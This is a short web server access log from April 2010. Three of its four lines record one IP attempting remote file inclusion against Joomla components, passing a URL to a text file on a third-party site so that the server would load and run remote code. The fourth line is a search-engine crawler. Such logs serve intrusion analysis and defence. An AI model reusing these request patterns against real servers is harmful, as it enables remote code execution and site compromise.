222.122.197.37 - - [09/Apr/2010:02:12:25 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:17:28 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:17:28 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.46.204.188 - - [09/Apr/2010:02:19:58 -0500] "GET /logs/access_log.1193443200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
